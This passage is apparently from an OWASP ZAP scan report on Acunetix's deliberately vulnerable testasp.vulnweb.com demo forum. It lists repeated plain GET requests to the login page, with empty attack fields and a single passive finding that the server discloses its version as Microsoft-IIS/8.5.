Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 399 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3256 |
| Response Body - size: 3,256 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - 